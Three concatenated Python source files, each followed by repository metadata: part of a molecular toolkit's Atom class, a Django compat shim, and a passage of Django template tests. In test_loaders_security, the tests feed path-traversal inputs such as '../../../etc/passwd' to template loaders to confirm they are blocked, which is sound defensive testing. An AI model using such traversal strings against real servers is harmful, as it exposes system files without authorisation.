return '<%s at %s (exception in __repr__)>' % (self.__class__.__name__, id(self))
def markdown_summary(self):
"""Return a markdown-formatted string describing this atom
Returns:
str: markdown-formatted string
"""
if self.molecule is None:
lines = ["<h3>Atom %s</h3>" % self.name]
else:
lines = ["<h3>Atom %s (index %d)</h3>" % (self.name, self.index)]
lines.append('**Atomic number**: %d' % self.atnum)
lines.append("**Mass**: %s" % self.mass)
lines.append('**Formal charge**: %s' % self.formal_charge)
if self.molecule is not None:
lines.append('\n')
if self.molecule.is_biomolecule:
if self.pdbindex is not None:
lines.append('**PDB serial #**: %s'%self.pdbindex)
lines.append("**Residue**: %s (index %d)" % (self.residue.name, self.residue.index))
lines.append("**Chain**: %s" % self.chain.name)
lines.append("**Molecule**: %s" % self.molecule.name)
for ibond, (nbr, order) in enumerate(self.bond_graph.iteritems()):
lines.append('**Bond %d** (order = %d): %s (index %s) in %s' % (
ibond + 1, order, nbr.name, nbr.index, nbr.residue.name))
if self.basis_functions:
lines.append('**Basis functions:**<br>' + '<br>'.join(map(str,self.basis_functions)))
if self.ff:
lines.append('**Forcefield partial charge**: %s' % self.ff.partialcharge)
# TODO: deal with other LJ types, e.g., AB?
lines.append(u'**Forcefield LJ params**: '
u'\u03C3=%s, \u03B5=%s' % (
self.ff.lj.sigma.defunits(),
self.ff.lj.epsilon.defunits()))
# position and momentum
table = utils.MarkdownTable('', 'x', 'y', 'z')
table.add_line(['**position /** {}'.format(u.default.length)] +
['%12.3f' % x.defunits_value() for x in self.position])
table.add_line(['**momentum /** {}'.format(u.default.momentum)] +
['%12.3e' % m.defunits_value() for m in self.momentum])
try:
self.force
except:
pass
else:
table.add_line(['**force /** {.units}'.format(self.force.defunits())] +
['%12.3e' % m.defunits_value() for m in self.force])
lines.append('\n\n' + table.markdown() + '\n\n')
# All other assigned properties
return '<br>'.join(lines)
def _repr_markdown_(self):
return self.markdown_summary()
@toplevel
class Atom(AtomDrawingMixin, AtomGeometryMixin, AtomPropertyMixin, AtomReprMixin):
""" A data structure representing an atom.
``Atom`` objects store information about individual atoms within a larger molecular system,
providing access to atom-specific geometric, biomolecular, topological and property
information. Each :class:`Molecule<moldesign.Molecule>` is composed of a list of atoms.
Atoms can be instantiated directly, but they will generally be created
automatically as part of molecules.
Args:
name (str): The atom's name (if not passed, set to the element name + the atom's index)
atnum (int): Atomic number (if not passed, determined from element if possible)
mass (units.Scalar[mass]): The atomic mass (if not passed, set to the most abundant isotopic
mass)
chain (moldesign.Chain): biomolecular chain that this atom belongs to
residue (moldesign.Residue): biomolecular residue that this atom belongs to
pdbname (str): name from PDB entry, if applicable
pdbindex (int): atom serial number in the PDB entry, if applicable
element (str): Elemental symbol (if not passed, determined from atnum if possible)
**Atom instance attributes:**
Attributes:
name (str): A descriptive name for this atom
element (str): IUPAC elemental symbol ('C', 'H', 'Cl', etc.)
index (int): the atom's current index in the molecule
(``self is self.parent.atoms[ self.index]``)
atnum (int): atomic number (synonyms: atomic_num)
mass (u.Scalar[mass]): the atom's mass
position (units.Vector[length]): atomic position vector. Once an atom is part of a molecule,
this quantity will refer to ``self.molecule.positions[self.index]``.
momentum (units.Vector[momentum]): atomic momentum vector. Once an atom is part of a
molecule, this quantity will refer to ``self.molecule.momenta[self.index]``.
x,y,z (u.Scalar[length]): x, y, and z components of ``atom.position``
vx, vy, vz (u.Scalar[length/time]): x, y, of ``atom.velocity``
px, py, pz (u.Scalar[momentum]): x, y, and z of ``atom.momentum``
fx, fy, fz (u.Scalar[force]): x, y, and z ``atom.force``
residue (moldesign.Residue): biomolecular residue that this atom belongs to
chain (moldesign.Chain): biomolecular chain that this atom belongs to
parent (moldesign.Molecule): molecule that this atom belongs to
index (int): index in the parent molecule: ``atom is atom.parent.atoms[index]``
**Atom methods and properties**
See also methods offered by the mixin superclasses:
- :class:`AtomDrawingMixin`
- :class:`AtomGeometryMixin`
- :class:`AtomPropertyMixin`
- :class:`AtomReprMixin`
"""
x, y, z = (AtomCoordinate('position', i) for i in xrange(3))
vx, vy, vz = (AtomCoordinate('velocity', i) for i in xrange(3))
px, py, pz = (AtomCoordinate('momentum', i) for i in xrange(3))
fx, fy, fz = (AtomCoordinate('force', i) for i in xrange(3))
position = AtomArray('_position', 'positions')
momentum = AtomArray('_momentum', 'momenta')
atomic_number = utils.Synonym('atnum')
#################################################################
# Methods for BUILDING the atom and indexing it in a molecule
def __init__(self, name=None, atnum=None, mass=None, chain=None, residue=None,
formal_charge=None, pdbname=None, pdbindex=None, element=None):
# Allow user to instantiate an atom as Atom(6) or Atom('C')
if atnum is None and element is None:
if isinstance(name, int):
atnum = name
name = None
else: element = name
if element: self.atnum = data.ATOMIC_NUMBERS[element]
else: self.atnum = atnum
self.name = utils.if_not_none(name, self.elem)
self.pdbname = utils.if_not_none(pdbname, self.name)
self.pdbindex = pdbindex
if mass is None: self.mass = data.ATOMIC_MASSES[self.atnum]
else: self.mass = mass
self.formal_charge = utils.if_not_none(formal_charge, 0.0 * u.q_e)
self.residue = residue
self.chain = chain
self.molecule = None
self.index = None
self._position = np.zeros(3) * u.default.length
self._momentum = np.zeros(3) * (u.default.length*
u.default.mass/u.default.time)
self._bond_graph = {}
@utils.args_from(AtomContainer.copy)
def copy(self, *args, **kwargs):
""" Copy an atom (delegate to AtomContainer)
"""
return self._container.copy(*args, **kwargs)[0]
def __getstate__(self):
"""Helper for pickling"""
state = self.__dict__.copy()
if self.molecule is not None: # then these don't belong to the atom anymore
state['_bond_graph'] = None
state['_position'] = self.position
state['_momentum'] = self.momentum
return state
def _set_molecule(self, molecule):
""" Permanently make this atom part of a molecule (private)
Args:
parent (moldesign.Molecule): the molecule that this atom will become a part of
"""
if self.molecule and (molecule is not self.molecule):
raise ValueError('Atom is already part of a molecule')
self.molecule = molecule
def _index_into_molecule(self, array_name, moleculearray, index):
""" Link the atom's positions and momenta to the parent molecule (private)
Args:
array_name (str): the private name of the array (assumes private name is '_'+array_name)
moleculearray (u.Array): the molecule's master array
index: the atom's index in the molecule
Note:
This will be called by the molecule's init method
"""
oldarray = getattr(self, array_name)
moleculearray[index, :] = oldarray
setattr(self, '_' + array_name, None) # remove the internally stored version
def bond_to(self, other, order):
""" Create or modify a bond with another atom
Args:
other (Atom): atom to bond to
order (int): bond order
Returns:
moldesign.molecules.bonds.Bond: bond object
"""
if self.molecule is other.molecule:
self.bond_graph[other] = other.bond_graph[self] = order
else: # allow unassigned atoms to be bonded to anything for building purposes
self.bond_graph[other] = order
return Bond(self, other, order)
@property
def bond_graph(self):
""" Mapping[Atom, int]: dictionary of this atoms bonded neighbors, of the form
``{bonded_atom1, bond_order1, ...}``
"""
if self.molecule is None:
return self._bond_graph
else:
self._bond_graph = None
try:
return self.molecule.bond_graph[self]
except KeyError:
self.molecule.bond_graph[self] = {}
return self.molecule.bond_graph[self]
@bond_graph.setter
def bond_graph(self, value):
if self.molecule is None:
self._bond_graph = value
else:
self._bond_graph = None
self.molecule.bond_graph[self] = value
@property
def bonds(self):
""" List[Bond]: list of all bonds this atom is involved in
"""
return [Bond(self, nbr, order) for nbr, order in self.bond_graph.iteritems()]
@property
def heavy_bonds(self):
""" List[Bond]: list of all heavy atom bonds (where BOTH atoms are not hydrogen)
Note:
this returns an empty list if called on a hydrogen atom
"""
if self.atnum == 1:
return []
else:
return [Bond(self, nbr, order)
for nbr, order in self.bond_graph.iteritems()
if nbr.atnum > 1]
@property
def force(self):
""" (units.Vector[force]): atomic force vector. This quantity must be calculated - it is
equivalent to ``self.molecule.forces[self.index]``
Raises:
moldesign.NotCalculatedError: if molecular forces have not been calculated
"""
f = self.molecule.forces
return f[self.index]
@property
def velocity(self):
""" u.Vector[length/time, 3]: velocity of this atom; equivalent to
``self.momentum/self.mass``
"""
return (self.momentum / self.mass).defunits()
@velocity.setter
def velocity(self, value):
self.momentum = value * self.mass
@property
def num_bonds(self):
""" int: the number of other atoms this atom is bonded to
"""
return len(self.bond_graph)
nbonds = num_bonds
@property
def valence(self):
""" int: the sum of this atom's bond orders
"""
return sum(v for v in self.bond_graph.itervalues())
@property
def symbol(self):
""" str: elemental symbol
"""
return data.ELEMENTS.get(self.atnum, '?')
elem = element = symbol
|
{
"content_hash": "3c5e0ffa093d02d501afc7d7c7b6ffb9",
"timestamp": "",
"source": "github",
"line_count": 487,
"max_line_length": 100,
"avg_line_length": 38.18069815195072,
"alnum_prop": 0.5945466279444982,
"repo_name": "tkzeng/molecular-design-toolkit",
"id": "8a8b3a93820714f1bf1ecb6d8c3b558d9427cf97",
"size": "19172",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "moldesign/molecules/atoms.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Fortran",
"bytes": "91473"
},
{
"name": "Groff",
"bytes": "6579"
},
{
"name": "Jupyter Notebook",
"bytes": "139700"
},
{
"name": "Python",
"bytes": "856527"
},
{
"name": "Shell",
"bytes": "2268"
}
],
"symlink_target": ""
}
|
"""
The `compat` module provides support for backwards compatibility with older
versions of Django/Python, and compatibility wrappers around optional packages.
"""
try:
# Available in Python 3.1+
import importlib
except ImportError:
# Will be removed in Django 1.9
from django.utils import importlib
try:
import goslate
except ImportError:
goslate = None
except SyntaxError:
import sys
import warnings
warnings.warn('goslate disabled due lack support of Python-%s' % (
sys.version.split()[0][:3]), RuntimeWarning)
goslate = None
try:
import googleapiclient
except ImportError:
googleapiclient = None
|
{
"content_hash": "fbdd07e0959b593628b6b869f7d4adf8",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 79,
"avg_line_length": 25.307692307692307,
"alnum_prop": 0.7218844984802432,
"repo_name": "dadasoz/dj-translate",
"id": "66ea244a7c6c06017e26473487bafdb5ed4411b2",
"size": "658",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "autotranslate/compat.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1850"
},
{
"name": "HTML",
"bytes": "15669"
},
{
"name": "JavaScript",
"bytes": "4614"
},
{
"name": "Python",
"bytes": "69514"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
from django.conf import settings
if __name__ == '__main__':
# When running this file in isolation, we need to set up the configuration
# before importing 'template'.
settings.configure()
from datetime import date, datetime, timedelta
import time
import os
import sys
import traceback
from urlparse import urljoin
from django import template
from django.template import base as template_base, RequestContext, Template, Context
from django.core import urlresolvers
from django.template import loader
from django.template.loaders import app_directories, filesystem, cached
from django.test import RequestFactory
from django.test.utils import (setup_test_template_loader,
restore_template_loaders, override_settings)
from django.utils import unittest
from django.utils.formats import date_format
from django.utils.translation import activate, deactivate, ugettext as _
from django.utils.safestring import mark_safe
from django.utils.tzinfo import LocalTimezone
from .callables import CallableVariablesTests
from .context import ContextTests
from .custom import CustomTagTests, CustomFilterTests
from .parser import ParserTests
from .unicode import UnicodeTests
from .nodelist import NodelistTest, ErrorIndexTest
from .smartif import SmartIfTests
from .response import (TemplateResponseTest, CacheMiddlewareTest,
SimpleTemplateResponseTest, CustomURLConfTest)
try:
from .loaders import RenderToStringTest, EggLoaderTest
except ImportError as e:
if "pkg_resources" in e.message:
pass # If setuptools isn't installed, that's fine. Just move on.
else:
raise
from . import filters
#################################
# Custom template tag for tests #
#################################
register = template.Library()
class EchoNode(template.Node):
def __init__(self, contents):
self.contents = contents
def render(self, context):
return " ".join(self.contents)
def do_echo(parser, token):
return EchoNode(token.contents.split()[1:])
def do_upper(value):
return value.upper()
register.tag("echo", do_echo)
register.tag("other_echo", do_echo)
register.filter("upper", do_upper)
template.libraries['testtags'] = register
#####################################
# Helper objects for template tests #
#####################################
class SomeException(Exception):
silent_variable_failure = True
class SomeOtherException(Exception):
pass
class ContextStackException(Exception):
pass
class ShouldNotExecuteException(Exception):
pass
class SomeClass:
def __init__(self):
self.otherclass = OtherClass()
def method(self):
return "SomeClass.method"
def method2(self, o):
return o
def method3(self):
raise SomeException
def method4(self):
raise SomeOtherException
def __getitem__(self, key):
if key == 'silent_fail_key':
raise SomeException
elif key == 'noisy_fail_key':
raise SomeOtherException
raise KeyError
def silent_fail_attribute(self):
raise SomeException
silent_fail_attribute = property(silent_fail_attribute)
def noisy_fail_attribute(self):
raise SomeOtherException
noisy_fail_attribute = property(noisy_fail_attribute)
class OtherClass:
def method(self):
return "OtherClass.method"
class TestObj(object):
def is_true(self):
return True
def is_false(self):
return False
def is_bad(self):
raise ShouldNotExecuteException()
class SilentGetItemClass(object):
def __getitem__(self, key):
raise SomeException
class SilentAttrClass(object):
def b(self):
raise SomeException
b = property(b)
class UTF8Class:
"Class whose __str__ returns non-ASCII data"
def __str__(self):
return 'ŠĐĆŽćžšđ'.encode('utf-8')
class Templates(unittest.TestCase):
def setUp(self):
self.old_static_url = settings.STATIC_URL
self.old_media_url = settings.MEDIA_URL
settings.STATIC_URL = "/static/"
settings.MEDIA_URL = "/media/"
def tearDown(self):
settings.STATIC_URL = self.old_static_url
settings.MEDIA_URL = self.old_media_url
def test_loaders_security(self):
ad_loader = app_directories.Loader()
fs_loader = filesystem.Loader()
def test_template_sources(path, template_dirs, expected_sources):
if isinstance(expected_sources, list):
# Fix expected sources so they are abspathed
expected_sources = [os.path.abspath(s) for s in expected_sources]
# Test the two loaders (app_directores and filesystem).
func1 = lambda p, t: list(ad_loader.get_template_sources(p, t))
func2 = lambda p, t: list(fs_loader.get_template_sources(p, t))
for func in (func1, func2):
if isinstance(expected_sources, list):
self.assertEqual(func(path, template_dirs), expected_sources)
else:
self.assertRaises(expected_sources, func, path, template_dirs)
template_dirs = ['/dir1', '/dir2']
test_template_sources('index.html', template_dirs,
['/dir1/index.html', '/dir2/index.html'])
test_template_sources('/etc/passwd', template_dirs, [])
test_template_sources('etc/passwd', template_dirs,
['/dir1/etc/passwd', '/dir2/etc/passwd'])
test_template_sources('../etc/passwd', template_dirs, [])
test_template_sources('../../../etc/passwd', template_dirs, [])
test_template_sources('/dir1/index.html', template_dirs,
['/dir1/index.html'])
test_template_sources('../dir2/index.html', template_dirs,
['/dir2/index.html'])
test_template_sources('/dir1blah', template_dirs, [])
test_template_sources('../dir1blah', template_dirs, [])
# UTF-8 bytestrings are permitted.
test_template_sources(b'\xc3\x85ngstr\xc3\xb6m', template_dirs,
['/dir1/Ångström', '/dir2/Ångström'])
# Unicode strings are permitted.
test_template_sources('Ångström', template_dirs,
['/dir1/Ångström', '/dir2/Ångström'])
test_template_sources('Ångström', [b'/Stra\xc3\x9fe'], ['/Straße/Ångström'])
test_template_sources(b'\xc3\x85ngstr\xc3\xb6m', [b'/Stra\xc3\x9fe'],
['/Straße/Ångström'])
# Invalid UTF-8 encoding in bytestrings is not. Should raise a
# semi-useful error message.
test_template_sources(b'\xc3\xc3', template_dirs, UnicodeDecodeError)
# Case insensitive tests (for win32). Not run unless we're on
# a case insensitive operating system.
if os.path.normcase('/TEST') == os.path.normpath('/test'):
template_dirs = ['/dir1', '/DIR2']
test_template_sources('index.html', template_dirs,
['/dir1/index.html', '/DIR2/index.html'])
test_template_sources('/DIR1/index.HTML', template_dirs,
['/DIR1/index.HTML'])
def test_loader_debug_origin(self):
# Turn TEMPLATE_DEBUG on, so that the origin file name will be kept with
# the compiled templates.
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, True
old_loaders = loader.template_source_loaders
try:
loader.template_source_loaders = (filesystem.Loader(),)
# We rely on the fact that runtests.py sets up TEMPLATE_DIRS to
# point to a directory containing a 404.html file. Also that
# the file system and app directories loaders both inherit the
# load_template method from the BaseLoader class, so we only need
# to test one of them.
load_name = '404.html'
template = loader.get_template(load_name)
template_name = template.nodelist[0].source[0].name
self.assertTrue(template_name.endswith(load_name),
'Template loaded by filesystem loader has incorrect name for debug page: %s' % template_name)
# Aso test the cached loader, since it overrides load_template
cache_loader = cached.Loader(('',))
cache_loader._cached_loaders = loader.template_source_loaders
loader.template_source_loaders = (cache_loader,)
template = loader.get_template(load_name)
template_name = template.nodelist[0].source[0].name
self.assertTrue(template_name.endswith(load_name),
'Template loaded through cached loader has incorrect name for debug page: %s' % template_name)
template = loader.get_template(load_name)
template_name = template.nodelist[0].source[0].name
self.assertTrue(template_name.endswith(load_name),
'Cached template loaded through cached loader has incorrect name for debug page: %s' % template_name)
finally:
loader.template_source_loaders = old_loaders
settings.TEMPLATE_DEBUG = old_td
def test_include_missing_template(self):
"""
Tests that the correct template is identified as not existing
when {% include %} specifies a template that does not exist.
"""
# TEMPLATE_DEBUG must be true, otherwise the exception raised
# during {% include %} processing will be suppressed.
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, True
old_loaders = loader.template_source_loaders
try:
# Test the base loader class via the app loader. load_template
# from base is used by all shipped loaders excepting cached,
# which has its own test.
loader.template_source_loaders = (app_directories.Loader(),)
load_name = 'test_include_error.html'
r = None
try:
tmpl = loader.select_template([load_name])
r = tmpl.render(template.Context({}))
except template.TemplateDoesNotExist as e:
settings.TEMPLATE_DEBUG = old_td
self.assertEqual(e.args[0], 'missing.html')
self.assertEqual(r, None, 'Template rendering unexpectedly succeeded, produced: ->%r<-' % r)
finally:
loader.template_source_loaders = old_loaders
settings.TEMPLATE_DEBUG = old_td
def test_extends_include_missing_baseloader(self):
"""
Tests that the correct template is identified as not existing
when {% extends %} specifies a template that does exist, but
that template has an {% include %} of something that does not
exist. See #12787.
"""
# TEMPLATE_DEBUG must be true, otherwise the exception raised
# during {% include %} processing will be suppressed.
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, True
old_loaders = loader.template_source_loaders
try:
# Test the base loader class via the app loader. load_template
# from base is used by all shipped loaders excepting cached,
# which has its own test.
loader.template_source_loaders = (app_directories.Loader(),)
load_name = 'test_extends_error.html'
tmpl = loader.get_template(load_name)
r = None
try:
r = tmpl.render(template.Context({}))
except template.TemplateDoesNotExist as e:
settings.TEMPLATE_DEBUG = old_td
self.assertEqual(e.args[0], 'missing.html')
self.assertEqual(r, None, 'Template rendering unexpectedly succeeded, produced: ->%r<-' % r)
finally:
loader.template_source_loaders = old_loaders
settings.TEMPLATE_DEBUG = old_td
def test_extends_include_missing_cachedloader(self):
"""
Same as test_extends_include_missing_baseloader, only tests
behavior of the cached loader instead of BaseLoader.
"""
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, True
old_loaders = loader.template_source_loaders
try:
cache_loader = cached.Loader(('',))
cache_loader._cached_loaders = (app_directories.Loader(),)
loader.template_source_loaders = (cache_loader,)
load_name = 'test_extends_error.html'
tmpl = loader.get_template(load_name)
r = None
try:
r = tmpl.render(template.Context({}))
except template.TemplateDoesNotExist as e:
self.assertEqual(e.args[0], 'missing.html')
self.assertEqual(r, None, 'Template rendering unexpectedly succeeded, produced: ->%r<-' % r)
# For the cached loader, repeat the test, to ensure the first attempt did not cache a
# result that behaves incorrectly on subsequent attempts.
tmpl = loader.get_template(load_name)
try:
tmpl.render(template.Context({}))
except template.TemplateDoesNotExist as e:
self.assertEqual(e.args[0], 'missing.html')
self.assertEqual(r, None, 'Template rendering unexpectedly succeeded, produced: ->%r<-' % r)
finally:
loader.template_source_loaders = old_loaders
settings.TEMPLATE_DEBUG = old_td
def test_token_smart_split(self):
# Regression test for #7027
token = template.Token(template.TOKEN_BLOCK, 'sometag _("Page not found") value|yesno:_("yes,no")')
split = token.split_contents()
self.assertEqual(split, ["sometag", '_("Page not found")', 'value|yesno:_("yes,no")'])
@override_settings(SETTINGS_MODULE=None, TEMPLATE_DEBUG=True)
def test_url_reverse_no_settings_module(self):
# Regression test for #9005
from django.template import Template, Context
t = Template('{% url will_not_match %}')
c = Context()
with self.assertRaises(urlresolvers.NoReverseMatch):
t.render(c)
@override_settings(DEBUG=True, TEMPLATE_DEBUG=True)
def test_no_wrapped_exception(self):
"""
The template system doesn't wrap exceptions, but annotates them.
Refs #16770
"""
c = Context({"coconuts": lambda: 42 / 0})
t = Template("{{ coconuts }}")
with self.assertRaises(ZeroDivisionError) as cm:
t.render(c)
self.assertEqual(cm.exception.django_template_source[1], (0, 14))
def test_invalid_block_suggestion(self):
# See #7876
from django.template import Template, TemplateSyntaxError
try:
t = Template("{% if 1 %}lala{% endblock %}{% endif %}")
except TemplateSyntaxError as e:
self.assertEqual(e.args[0], "Invalid block tag: 'endblock', expected 'elif', 'else' or 'endif'")
def test_templates(self):
template_tests = self.get_template_tests()
filter_tests = filters.get_filter_tests()
# Quickly check that we aren't accidentally using a name in both
# template and filter tests.
overlapping_names = [name for name in filter_tests if name in template_tests]
assert not overlapping_names, 'Duplicate test name(s): %s' % ', '.join(overlapping_names)
template_tests.update(filter_tests)
cache_loader = setup_test_template_loader(
dict([(name, t[0]) for name, t in template_tests.iteritems()]),
use_cached_loader=True,
)
failures = []
tests = template_tests.items()
tests.sort()
# Turn TEMPLATE_DEBUG off, because tests assume that.
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, False
# Set TEMPLATE_STRING_IF_INVALID to a known string.
old_invalid = settings.TEMPLATE_STRING_IF_INVALID
expected_invalid_str = 'INVALID'
#Set ALLOWED_INCLUDE_ROOTS so that ssi works.
old_allowed_include_roots = settings.ALLOWED_INCLUDE_ROOTS
settings.ALLOWED_INCLUDE_ROOTS = (
os.path.dirname(os.path.abspath(__file__)),
)
# Warm the URL reversing cache. This ensures we don't pay the cost
# warming the cache during one of the tests.
urlresolvers.reverse('regressiontests.templates.views.client_action',
kwargs={'id':0,'action':"update"})
for name, vals in tests:
if isinstance(vals[2], tuple):
normal_string_result = vals[2][0]
invalid_string_result = vals[2][1]
if isinstance(invalid_string_result, tuple):
expected_invalid_str = 'INVALID %s'
invalid_string_result = invalid_string_result[0] % invalid_string_result[1]
template_base.invalid_var_format_string = True
try:
template_debug_result = vals[2][2]
except IndexError:
template_debug_result = normal_string_result
else:
normal_string_result = vals[2]
invalid_string_result = vals[2]
template_debug_result = vals[2]
if 'LANGUAGE_CODE' in vals[1]:
activate(vals[1]['LANGUAGE_CODE'])
else:
activate('en-us')
for invalid_str, template_debug, result in [
('', False, normal_string_result),
(expected_invalid_str, False, invalid_string_result),
('', True, template_debug_result)
]:
settings.TEMPLATE_STRING_IF_INVALID = invalid_str
settings.TEMPLATE_DEBUG = template_debug
for is_cached in (False, True):
try:
try:
test_template = loader.get_template(name)
except ShouldNotExecuteException:
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Template loading invoked method that shouldn't have been invoked." % (is_cached, invalid_str, template_debug, name))
try:
output = self.render(test_template, vals)
except ShouldNotExecuteException:
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Template rendering invoked method that shouldn't have been invoked." % (is_cached, invalid_str, template_debug, name))
except ContextStackException:
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Context stack was left imbalanced" % (is_cached, invalid_str, template_debug, name))
continue
except Exception:
exc_type, exc_value, exc_tb = sys.exc_info()
if exc_type != result:
tb = '\n'.join(traceback.format_exception(exc_type, exc_value, exc_tb))
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Got %s, exception: %s\n%s" % (is_cached, invalid_str, template_debug, name, exc_type, exc_value, tb))
continue
if output != result:
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Expected %r, got %r" % (is_cached, invalid_str, template_debug, name, result, output))
cache_loader.reset()
if 'LANGUAGE_CODE' in vals[1]:
deactivate()
if template_base.invalid_var_format_string:
expected_invalid_str = 'INVALID'
template_base.invalid_var_format_string = False
restore_template_loaders()
deactivate()
settings.TEMPLATE_DEBUG = old_td
settings.TEMPLATE_STRING_IF_INVALID = old_invalid
settings.ALLOWED_INCLUDE_ROOTS = old_allowed_include_roots
self.assertEqual(failures, [], "Tests failed:\n%s\n%s" %
('-'*70, ("\n%s\n" % ('-'*70)).join(failures)))
def render(self, test_template, vals):
context = template.Context(vals[1])
before_stack_size = len(context.dicts)
output = test_template.render(context)
if len(context.dicts) != before_stack_size:
raise ContextStackException
return output
def get_template_tests(self):
# SYNTAX --
# 'template_name': ('template contents', 'context dict', 'expected string output' or Exception class)
basedir = os.path.dirname(os.path.abspath(__file__))
tests = {
### BASIC SYNTAX ################################################
# Plain text should go through the template parser untouched
'basic-syntax01': ("something cool", {}, "something cool"),
# Variables should be replaced with their value in the current
# context
'basic-syntax02': ("{{ headline }}", {'headline':'Success'}, "Success"),
# More than one replacement variable is allowed in a template
'basic-syntax03': ("{{ first }} --- {{ second }}", {"first" : 1, "second" : 2}, "1 --- 2"),
# Fail silently when a variable is not found in the current context
'basic-syntax04': ("as{{ missing }}df", {}, ("asdf","asINVALIDdf")),
# A variable may not contain more than one word
'basic-syntax06': ("{{ multi word variable }}", {}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError for empty variable tags
'basic-syntax07': ("{{ }}", {}, template.TemplateSyntaxError),
'basic-syntax08': ("{{ }}", {}, template.TemplateSyntaxError),
# Attribute syntax allows a template to call an object's attribute
'basic-syntax09': ("{{ var.method }}", {"var": SomeClass()}, "SomeClass.method"),
# Multiple levels of attribute access are allowed
'basic-syntax10': ("{{ var.otherclass.method }}", {"var": SomeClass()}, "OtherClass.method"),
# Fail silently when a variable's attribute isn't found
'basic-syntax11': ("{{ var.blech }}", {"var": SomeClass()}, ("","INVALID")),
# Raise TemplateSyntaxError when trying to access a variable beginning with an underscore
'basic-syntax12': ("{{ var.__dict__ }}", {"var": SomeClass()}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError when trying to access a variable containing an illegal character
'basic-syntax13': ("{{ va>r }}", {}, template.TemplateSyntaxError),
'basic-syntax14': ("{{ (var.r) }}", {}, template.TemplateSyntaxError),
'basic-syntax15': ("{{ sp%am }}", {}, template.TemplateSyntaxError),
'basic-syntax16': ("{{ eggs! }}", {}, template.TemplateSyntaxError),
'basic-syntax17': ("{{ moo? }}", {}, template.TemplateSyntaxError),
# Attribute syntax allows a template to call a dictionary key's value
'basic-syntax18': ("{{ foo.bar }}", {"foo" : {"bar" : "baz"}}, "baz"),
# Fail silently when a variable's dictionary key isn't found
'basic-syntax19': ("{{ foo.spam }}", {"foo" : {"bar" : "baz"}}, ("","INVALID")),
# Fail silently when accessing a non-simple method
'basic-syntax20': ("{{ var.method2 }}", {"var": SomeClass()}, ("","INVALID")),
# Don't get confused when parsing something that is almost, but not
# quite, a template tag.
'basic-syntax21': ("a {{ moo %} b", {}, "a {{ moo %} b"),
'basic-syntax22': ("{{ moo #}", {}, "{{ moo #}"),
# Will try to treat "moo #} {{ cow" as the variable. Not ideal, but
# costly to work around, so this triggers an error.
'basic-syntax23': ("{{ moo #} {{ cow }}", {"cow": "cow"}, template.TemplateSyntaxError),
# Embedded newlines make it not-a-tag.
'basic-syntax24': ("{{ moo\n }}", {}, "{{ moo\n }}"),
# Literal strings are permitted inside variables, mostly for i18n
# purposes.
'basic-syntax25': ('{{ "fred" }}', {}, "fred"),
'basic-syntax26': (r'{{ "\"fred\"" }}', {}, "\"fred\""),
'basic-syntax27': (r'{{ _("\"fred\"") }}', {}, "\"fred\""),
# regression test for ticket #12554
# make sure a silent_variable_failure Exception is supressed
# on dictionary and attribute lookup
'basic-syntax28': ("{{ a.b }}", {'a': SilentGetItemClass()}, ('', 'INVALID')),
'basic-syntax29': ("{{ a.b }}", {'a': SilentAttrClass()}, ('', 'INVALID')),
# Something that starts like a number but has an extra lookup works as a lookup.
'basic-syntax30': ("{{ 1.2.3 }}", {"1": {"2": {"3": "d"}}}, "d"),
'basic-syntax31': ("{{ 1.2.3 }}", {"1": {"2": ("a", "b", "c", "d")}}, "d"),
'basic-syntax32': ("{{ 1.2.3 }}", {"1": (("x", "x", "x", "x"), ("y", "y", "y", "y"), ("a", "b", "c", "d"))}, "d"),
'basic-syntax33': ("{{ 1.2.3 }}", {"1": ("xxxx", "yyyy", "abcd")}, "d"),
'basic-syntax34': ("{{ 1.2.3 }}", {"1": ({"x": "x"}, {"y": "y"}, {"z": "z", "3": "d"})}, "d"),
# Numbers are numbers even if their digits are in the context.
'basic-syntax35': ("{{ 1 }}", {"1": "abc"}, "1"),
'basic-syntax36': ("{{ 1.2 }}", {"1": "abc"}, "1.2"),
# Call methods in the top level of the context
'basic-syntax37': ('{{ callable }}', {"callable": lambda: "foo bar"}, "foo bar"),
# Call methods returned from dictionary lookups
'basic-syntax38': ('{{ var.callable }}', {"var": {"callable": lambda: "foo bar"}}, "foo bar"),
'builtins01': ('{{ True }}', {}, "True"),
'builtins02': ('{{ False }}', {}, "False"),
'builtins03': ('{{ None }}', {}, "None"),
# List-index syntax allows a template to access a certain item of a subscriptable object.
'list-index01': ("{{ var.1 }}", {"var": ["first item", "second item"]}, "second item"),
# Fail silently when the list index is out of range.
'list-index02': ("{{ var.5 }}", {"var": ["first item", "second item"]}, ("", "INVALID")),
# Fail silently when the variable is not a subscriptable object.
'list-index03': ("{{ var.1 }}", {"var": None}, ("", "INVALID")),
# Fail silently when variable is a dict without the specified key.
'list-index04': ("{{ var.1 }}", {"var": {}}, ("", "INVALID")),
# Dictionary lookup wins out when dict's key is a string.
'list-index05': ("{{ var.1 }}", {"var": {'1': "hello"}}, "hello"),
# But list-index lookup wins out when dict's key is an int, which
# behind the scenes is really a dictionary lookup (for a dict)
# after converting the key to an int.
'list-index06': ("{{ var.1 }}", {"var": {1: "hello"}}, "hello"),
# Dictionary lookup wins out when there is a string and int version of the key.
